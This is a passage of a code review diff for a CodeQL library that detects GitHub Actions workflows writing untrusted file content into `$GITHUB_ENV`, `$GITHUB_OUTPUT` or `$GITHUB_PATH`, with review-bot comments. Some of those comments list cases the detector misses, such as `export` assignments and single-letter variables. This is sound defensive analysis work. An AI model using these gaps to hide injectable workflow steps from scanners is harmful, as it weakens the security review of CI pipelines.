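Review bot: The nine members added to `Run` are public API with no QLDoc, and five of them are result-less predicates named `get…` (`getAssignment`, `getAnAssignment`, `getAWriteToGitHubEnv`, `getAWriteToGitHubOutput`, `getAWriteToGitHubPath`), a prefix QL convention reserves for result-bearing members — a reader expects `run.getAWriteToGitHubEnv(n, v)` to yield a value, not to hold. Renaming would break callers, so at minimum document them, e.g. `/** Holds if statement `i` of the script assigns `value` to the shell variable `name`. */` and `/** Holds if the script writes `name=value` to the file named by `$GITHUB_ENV`. */`, and state for `getStmt`/`getCommand` whether the index is 0-based and what one "command" is relative to a statement. Those semantics are inferred from the names — `RunImpl` in `ast/internal/Ast.qll` is not in this hunk, so confirm them against it before writing the doc. The `Run` class itself opens before the hunk.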
@@ -24,219 +24,6 @@ string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -/** Checks if expr is a bash parameter expansion */ -bindingset[expr] -predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { - exists(string regexp | - // $VAR - regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${VAR} - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = "" and - params = "" - or - // ${!VAR} - regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and - parameter = expr.regexpCapture(regexp, 2) and - operator = expr.regexpCapture(regexp, 1) and - params = "" - or - // ${VAR}, ... - regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and - parameter = expr.regexpCapture(regexp, 1) and - operator = expr.regexpCapture(regexp, 2) and - params = expr.regexpCapture(regexp, 3) - ) -} - -bindingset[raw_content] -predicate extractVariableAndValue(string raw_content, string key, string value) { - exists(string regexp, string content | content = trimQuotes(raw_content) | - regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and - key = trimQuotes(content.regexpCapture(regexp, 1)) and - value = trimQuotes(content.regexpCapture(regexp, 3)) - or - exists(string line | - line = content.splitAt("\n") and - regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and - key = trimQuotes(line.regexpCapture(regexp, 1)) and - value = trimQuotes(line.regexpCapture(regexp, 2)) - ) - ) -} - -bindingset[script] -predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and - cmd = script.regexpCapture(regexp, 1) 
and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" and - content = script.regexpCapture(regexp, 2) - ) -} - -bindingset[script] -predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { - exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = script.regexpCapture(regexp, 4) and - value = trimQuotes(script.regexpCapture(regexp, 5)) - or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and - cmd = script.regexpCapture(regexp, 3) and - key = "" and - value = trimQuotes(script.regexpCapture(regexp, 4)) - ) -} - -bindingset[script] -predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and - content = script.regexpCapture(regexp, 6) and - filters = "" - or - regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and - cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 7)) and - filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 8) - ) -} - -bindingset[script] -predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + - "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and - content = - trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + - 
trimQuotes(script.regexpCapture(regexp, 6)) + - // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content - //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and - cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - filters = "" - ) -} - -bindingset[script] -predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { - exists(string regexp | - regexp = - "(?msi).*^\\s*\\{\\s*[\r\n]" + - // - "(.*?)" + - // - "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and - content = - script - .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") - .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 5)) and - cmd = "echo" and - filters = "" - ) -} - -bindingset[script] -predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { - heredocFileWrite(script, cmd, file, content, filters) - or - linesFileWrite(script, cmd, file, content, filters) - or - blockFileWrite(script, cmd, file, content, filters) -} - -bindingset[script, file_var] -predicate extractFileWrite(string script, string file_var, string content) { - // single line assignment - exists(string file_expr, string raw_content | - isBashParameterExpansion(file_expr, file_var, _, _) and - singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and - content = trimQuotes(raw_content) - ) - or - // workflow command assignment - exists(string key, string value, string cmd | - ( - file_var = "GITHUB_ENV" and - cmd = "set-env" and - content = key + "=" + value - or - file_var = "GITHUB_OUTPUT" and - cmd = "set-output" and - content = key + "=" + value - or - file_var = "GITHUB_PATH" and - cmd = "add-path" and - content = value - ) and - 
singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) - ) - or - // multiline assignment - exists(string file_expr, string raw_content | - multiLineFileWrite(script, _, file_expr, raw_content, _) and - isBashParameterExpansion(file_expr, file_var, _, _) and - content = trimQuotes(raw_content) - ) -} - -predicate writeToGitHubEnv(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_ENV", content) -} - -predicate writeToGitHubOutput(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) -} - -predicate writeToGitHubPath(Run run, string content) { - extractFileWrite(run.getScript(), "GITHUB_PATH", content) -} - -/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ -bindingset[script, file_var] -predicate fileToFileWrite(string script, string file_var, string path) { - exists(string regexp, string line, string file_expr | - isBashParameterExpansion(file_expr, file_var, _, _) and - regexp = - "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + - "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - line = script.splitAt("\n") and - path = line.regexpCapture(regexp, 2) and - file_expr = trimQuotes(line.regexpCapture(regexp, 5)) - ) -} - -predicate fileToGitHubEnv(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_ENV", path) -} - -predicate fileToGitHubOutput(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) -} - -predicate fileToGitHubPath(Run run, string path) { - fileToFileWrite(run.getScript(), "GITHUB_PATH", path) -} - predicate inPrivilegedContext(AstNode node, Event event) { node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } 
@@ -245,16 +32,6 @@ predicate inNonPrivilegedContext(AstNode node) { not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } -bindingset[snippet] -predicate outputsPartialFileContent(string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 -} - string defaultBranchNames() { repositoryDataModel(_, result) or 
@@ -321,80 +98,225 @@ module Bash { string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + /** Checks if expr is a bash parameter expansion */ + bindingset[expr] + predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + 
file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = + "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + + // "$(" + + 
trimQuotes(script.regexpCapture(regexp, 6)) + + // ")\n" + + "\n" + trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + bindingset[script] - string getACommand(string script) { - exists(string stmt_, string stmt, string subline2, string cmd | - stmt_ = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n") and - stmt = - [ - // $() command substitution - stmt_ - .regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", _, _) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", ""), - // `...` command substitution - stmt_ - .regexpFind("\\`[^\\`]+\\`", _, _) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", ""), - // original line with no substitutions - stmt_ - .regexpReplaceAll("\\`[^\\`]+\\`", "SUBCOMMAND") - .regexpReplaceAll("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", "SUBCOMMAND") - ] and - // We shoulg replace quoted arguments with a placeholder to avoid splitting them - // eg: ls | grep -E "*.(tar.gz|zip)$" - //subline2 = subline.regexpReplaceAll("\"([^\"]+)\"", "$0").regexpReplaceAll("'([^']+)'", "$0") and + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + 
blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[script, file_var] + predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | ( - stmt.regexpMatch(".*\"([^\"]+)\".*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("\"([^\"]+)\"", _, i), - stmt.regexpFind("\"([^\"]+)\"", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value or - stmt.regexpMatch(".*'([^']+)'.*") and - exists(int i | - subline2 = - stmt.replaceAll(stmt.regexpFind("'([^']+)'", _, i), - stmt.regexpFind("'([^']+)'", _, i) - .replaceAll("|", "::PIPE::") - .replaceAll(";", "::SEMICOLON::") - .replaceAll("&&", "::AND::") - .replaceAll("||", "::OR::")) - ) + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value or - not stmt.regexpMatch(".*'([^']+)'.*") and - not stmt.regexpMatch(".*\"([^\"]+)\".*") and - subline2 = stmt + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value ) and - cmd = subline2.splitAt(splitSeparators()).trim() and - // when splitting the line with a separator that is not found, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not cmd.indexOf(splitSeparators()) > -1 and - not cmd = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", - "case", "esac", "{", "}" - ] and - result = - cmd.replaceAll("::PIPE::", "|") - .replaceAll("::SEMICOLON::", ";") - 
.replaceAll("::AND::", "&&") - .replaceAll("::OR::", "||") + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } - bindingset[script] - predicate getAnAssignment(string script, string name, string value) { - exists(string stmt | - stmt = script.regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n").trim() and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + bindingset[script, file_var] + predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) + } + + predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) + } + + predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) + } + + predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) + } + + bindingset[snippet] + predicate outputsPartialFileContent(Run run, string snippet) { + // e.g. 
+ // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV + // echo "FOO=$(> $GITHUB_ENV + // yq '.foo' foo.yml >> $GITHUB_PATH + // cat foo.txt >> $GITHUB_PATH + // Bash::getACommand(snippet).indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 + exists(int i, string line, string cmd | + run.getStmt(i) = line and + line.matches("%" + snippet + "%") and + run.getCommand(i) = cmd and + cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 ) } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5b96781a10b1..30b57e361abd 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1319,12 +1319,6 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - string getACommand() { result = Bash::getACommand(this.getScript()) } - - predicate getAnAssignment(string name, string value) { - Bash::getAnAssignment(this.getScript(), name, value) - } - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } 
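Review bot: In `outputsPartialFileContent`, `line.matches("%" + snippet + "%")` uses the snippet as a LIKE-style pattern, so any `_` or `%` inside it is a wildcard; a value such as `$(cat test_results/sha)` then matches more statements than intended. An exact substring test avoids that: `exists(line.indexOf(snippet))`. The snippet and the file-reading command are only coupled through the statement index `i`, so a `cat`/`jq` that merely shares a physical line with the snippet's statement (after `;` or `&&`) appears to qualify it, which looks like it can over-report; if that is deliberate it deserves a comment, otherwise the check should be tied to the command substitution itself. Separately, the `$VAR` branch of `isBashParameterExpansion` uses `[a-zA-Z_][a-zA-Z0-9_]+`, which needs two or more name characters, so single-letter variables like `$f` are never recognised; `*` as in the `${VAR}` branch would fix it. `module Bash` opens before this hunk.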
@@ -1344,6 +1338,194 @@ class RunImpl extends StepImpl { .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") else result = "GITHUB_WORKSPACE/" } + + private string lineProducer(int i) { + result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = 
this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparators()) > -1 + } + + private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + 
this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredQuotedStringLineProducer(int i) { + result = + max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + } + + private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getStmt(int i) { + result = + max(int round, string new | + this.doRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getAStmt() { result = this.getStmt(_) } + + predicate getAssignment(int i, string name, string value) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } + + string getCommand(int i) { + result = this.getStmt(i) and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + + predicate getAWriteToGitHubEnv(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubOutput(string name, string value) { + exists(string raw | + Bash::extractFileWrite(this.getScript(), 
"GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, value) + ) + } + + predicate getAWriteToGitHubPath(string value) { + Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4b8cff4f4281..f43d1bdcd878 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,20 +82,17 @@ predicate envToArgInjSink(string var_name, Run run, string command) { */ bindingset[var_name] predicate envToSpecialFile(string file, string var_name, Run run, string key) { - exists(string content, string value | + exists(string value | ( file = "GITHUB_ENV" and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubEnv(key, value) or file = "GITHUB_OUTPUT" and - writeToGitHubOutput(run, content) and - extractVariableAndValue(content, key, value) + run.getAWriteToGitHubOutput(key, value) or file = "GITHUB_PATH" and - writeToGitHubPath(run, content) and - key = "path" and - value = content + run.getAWriteToGitHubPath(value) and + key = "path" ) and envToRunExpr(var_name, run, value) ) 
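Review bot: `getAssignment` (and so `getAnAssignment`, which the env/output/path sinks consult for the `FOO=$(cat …)` then `echo "FOO=$FOO" >> $GITHUB_ENV` pattern) only accepts a bare `NAME=value` statement, so `export FOO=$(cat untrusted.txt)` and `local`/`readonly`/`declare` forms are not seen as assignments and the file-read origin is lost. Allowing an optional prefix in both captures would close that gap, e.g. `name = stmt.regexpCapture("^(?:(?:export|local|readonly|declare(?:\\s+-\\w+)*)\\s+)?([a-zA-Z0-9\\-_]+)=.*", 1)` with the same prefix added to the `value` regexp. The single-quoted branch of `quotedStringReplacement` (`'((?:\\\\.|[^'\\\\])*)'`) treats a backslash as an escape, but bash single quotes have no escape character, so `'a\\'` followed by another quoted word is swallowed into one string; probably rare, but a comment noting the approximation would help. `class RunImpl` opens before this hunk.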
@@ -144,14 +141,13 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string var_name, string content, string key, string value | - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, key, value) and + exists(Run run, string var_name, string key, string value | + run.getAWriteToGitHubEnv(key, value) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - isBashParameterExpansion(value, var_name, _, _) + Bash::isBashParameterExpansion(value, var_name, _, _) ) } 
@@ -178,29 +174,24 @@ predicate controlledCWD(Step artifact) { * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, Step artifact, string content, string key, string value | + exists(Run run, Step artifact, string key, string value | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, Step artifact | + exists(Run run, string key, string value, Step artifact | controlledCWD(artifact) and ( // A file is read and its content is assigned to an env var // - run: | // foo=$(> "$GITHUB_ENV" - exists(string var_name, string line, string assignment_regexp, string file_read | - run.getScript().splitAt("\n") = line and - assignment_regexp = "([a-zA-Z0-9\\-_]+)=(.*)" and - var_name = line.regexpCapture(assignment_regexp, 1) and - file_read = line.regexpCapture(assignment_regexp, 2) and - outputsPartialFileContent(file_read) and + exists(string var_name, string file_read | + run.getAnAssignment(var_name, file_read) and + Bash::outputsPartialFileContent(run, file_read) and envToRunExpr(var_name, run, 